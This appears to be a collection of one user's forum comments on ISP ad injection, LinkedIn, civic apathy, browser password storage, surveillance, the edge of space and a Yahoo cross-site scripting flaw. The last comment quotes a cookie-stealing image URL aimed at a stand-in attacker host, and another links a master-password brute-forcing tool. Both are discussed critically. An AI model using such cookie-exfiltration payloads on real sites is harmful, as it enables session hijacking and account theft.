Doesn't that blatantly violate the copyright of the websites who are serving that data?

Doesn't doubleclick have enough lawyers to blow Bell back to the stone age?

I specifically remember years ago, when someone tried to build a CLIENT SIDE application that allowed you and others to "comment on top of" a website as it was displayed in your browser, they got completely blown out of the water over this, because they were "defacing and modifying someone else's copyright'd content" -- and that wasn't even as clear as this, that was in your browser after it had been displayed, this is flat out interception of communication between me and a third party and MODIFICATION of said data.

It's just completely fucked up. Everyone needs to enable SSL on their websites, cpu and bandwidth be damned.

Two separate times over a couple years I have gone into my linked-in profile and de-selected ALL the "email you this" and "email you that" options.

I kept getting email notifications for large numbers of things. (Yes, I waited 7+ days after each profile change.)

TWICE I've gone to their technical support staff. TWICE they've failed to figure out how to configure their systems to not send me e-mail notifications. The second time they flat out apologized for not being able to do it successfully, they were able to recognize that however their back end is configured and architected ... it's just impossible to do certain things.

Yeah, no, I'm not trusting private data to them.

I should say, I'm commenting on the "only 1 out of 100's" aspect -- not on the "oust the gov" ala revolution.

Rather -- we haven't even begun to use the peaceful means out society provides to correct things and enact change. It sometimes REQUIRES us to become involved with the process.

( Dang it, when will slashdot let me edit a post? Get with the times man. )

Yeah, there is a massive amount of historical evidence that people will "go with the crowd" and it's rare, really rare, to see someone sacrifice even a modecum of their ... time let alone personal safety/comfort, even if it's just theoretical acceptance of a risk ... to help defend what they think is important. It's too easy to come up with excuses to not act*.

  - Things aren't too bad yet
  - Other people are working on it
  - I'll do something when the time is right
  - Well it's not as important as I thought
  - I'm not potentially sacrificing my career or even a small part of my liberty for this, simply "holding my opinion" is my contribution to "resisting".
  - My contribution is too small to matter. No one will listen.
  - Secret dark forces we cannot fight are arrayed against us**.
  - etc

(*) And I'm Including myself here. I haven't written a letter to anyone yet about any of the serious things that have happened lately.
(**) A huge fraction of people are conspiracy theorists, and they ALWAYS pull this out of the hat when you ask them "omg that's horrible, what are you personally doing about it".)

> The late Donald Murray, a rifleman in WWII, wrote that the guys who were loudest before combat usually were the ones he could not rely on in a firefight.

Too many "Donald Murray's" in the world for google to find, got any references/links? Always love reading a good first person story from people like this.

Cheers.

It is theatre. Even your non-techie friends can use google, which immediately leads to tools that can brute force the master password (http://securityxploded.com/firemaster.php), and without a doubt there are tools out there that will read the master password from running memory, and I'd expect that to appear in open/published tools like the above someday too.

The main problem with this theatre is that you and other people might be fooled into believing you are more secure than you are, and store things there that you should not.

The software developers are refusing to participate in this theatre in order to force you to recognize the actual reality of the situation.

If one person stores their bank credentials in their browser password database and looses their life savings, it's unacceptable.

Note -- Pidgin doesn't support a master password nor does it even obfuscate the stored passwords, the passwords are stored in a text file IN THE CLEAR, because they are making a conscious choice to explicitly point out to you that there is no actual security for 90% of the cases where you will be attacked. If someone can read your files and your user's system memory, they have you.

SHHHHHHhhh, don't give them any ideas!

2099 to 2135 - Second Era of Known Space: Life-extending organ transplants are supplied by the organ banks, which are mainly supplied by the bodies of executed criminals. The enormous demand for organs has vastly increased use of the death penalty, to include even minor crimes.

I think he's using the past tense as in the DISTANT past, like 250 years ago on western sailing warships and the like, or back in the days of slavery.

Yes, this is a geek site. Here is some reading for you:

http://en.wikipedia.org/wiki/Histogram

> pedantic

Not all techies are pedantic, and even if we were - OBVIOUSLY there are implied ranges. They might be fuzzy, but they're there.

> 1984

Is infinite and open access to information the core of "what's wrong" with society in 1984? Or is it the fact that the citizens have no control over their government, no freedom of speach, etc?

What's the technological difference between

- all citizens each day looking at photos of people wanted by the police for what we consider crimes, and calling the local detachment when we recognize someone
- a computer doing the above
- citizens calling the KGB because their neighbour said something snarky about the state
- a computer doing the above

> Brave New World

And I quote: "The vast majority of the population is unified under the World State, an eternally peaceful, stable global society in which goods and resources are plentiful (because the population is permanently limited to no more than two billion people) and everyone is happy."

I strongly object to warrantless wiretapping, and I definitely want tons of checks and balances, and I want my elected representatives to share my values.

That doesn't mean that "databases" are inherently bad, or can't help us create a more effective just society. Like all tools, it depends on how you use them. Ever read "The Golden Age" by John C. Wright, or any of the Polity novels by Neal Asher?

Afford, yes. Implement? PROPERLY?

I kid you not, 90% of general purpose software developers are not sharp enough to "touch" security related code or systems without leaving GAPING holes because they totally don't understand or misunderstand simple things.

They can write an if/else or a while loop, but other more advanced things ... just beyond them. And even the moderately smart senior personnel will accidentally leave something in a "prototype" state and accidentally ship it because of deadlines.

This is the security/encryption equivalent of a Barracuda anti-spam appliance. Yes, any smart sharp sysadmin with sufficient time allocated to the task can implement brilliant near-perfect spam filtering using open source products. LOTS of sysadmins a) aren't that smart: it won't be configured nearly as well as a company needs, and it'll fail frequently or do strange things because they disagree on how it should work, and b) they won't have sufficient man weeks allocated to it, and remember, the less sharp the person is, the more time they'll need and the more problems there will be.

WAY BETTER for an SMB* to simply drop cash on an "appliance". It's almost impossible for a Barracuda to do worse than your average overworked sysadmin.

I'm not a shill for the latter, it's simply the device the SMB I work for uses. And our sysadmin's aren't dumb. They're just not brilliant and they are, of course, overworked.

(*) Small and Medium Busuiness

Perhaps. But 100km is a pretty arbitrary number. When I was growing up (and where I live everything was still in miles, especially anything written by or about the US space program), space was "100 miles" up. Funny how it's a neat round number like that.

http://ww2010.atmos.uiuc.edu/guides/mtr/prs/gifs/hght2.gif

He's above 99% of the atmosphere. That's good enough for me. "Edge" -- how do you define that? He's not IN space, certainly. I wouldn't compare it to a beach, a beach is only 10-100 feet wide. I'd make the argument that the "Edge" of space is a "beach" that's around 50km wide :)

Related question - what would make a good fundamental "minimum altitude" to say "space"?

50% odds of making one orbit (if you had sufficient tangential velocity at that altitude) without orbital decay? How much orbital decay? ALL orbits decay "a bit". 50% odds of making one orbit and being able to make a second orbit without touching the ground "underneath" your starting point?

And THEN on top of that, there's the fluctuating undulating atmosphere, that line is going to change day to day and year to year and place to place. Of course, if the tide rises and your boat is floating "closer to shore", you're still "on the ocean" :)

I'm not assaulting a kid and stealing his property while on an airplane.

Yes, these are exactly what the kid would claim the moment he started a fistfight over his frickin property, on an airplane.

And there you'd sit, trying to defend your actions after the plane had returned to the ground and both you and the kid kicked off the airplane and banned from flying that airline ever again.

No. Way.

> I know pilots that have cellphone conversations while landing a 737.

This wouldn't be the same pilots who missed a audible LORAN transmitter's approach turn signal in the Andes and killed 200 people crashing into a mountain?

Because of course, all pilots are "experts" at what they do and they never make poor choices killing hundreds of their clients.

> All the hacker has to do is embed a link or image into an email and send that email to the Yahoo account of the victim. The victim then logs in and clicks the link or views the images. ..snip..
>
> Simplified example:
Embedded image src in email: http://www.hacker.com/cookieparser.php?default=alert(document.cookie)

I hope I don't understand that correctly.

WHY is any browser expressing a cooking via javascript as a target of a link to a site that has nothing to do with the cookie?

WHY would any browser allow any method of sending cookies to sites OTHER than the ones the cookie identifies with?

They can't possibly expect every application and website developer in the world to write huge amounts of complicated "cleaning" code. That's idiotic. Why would they, in this day and age, introduce functionality in the specifictions that allow stuff like this?

If Yahoo can't keep with all the "functionality" that's available via javascript, you can guess how far behind the curve the application developers are at your small midwest bank.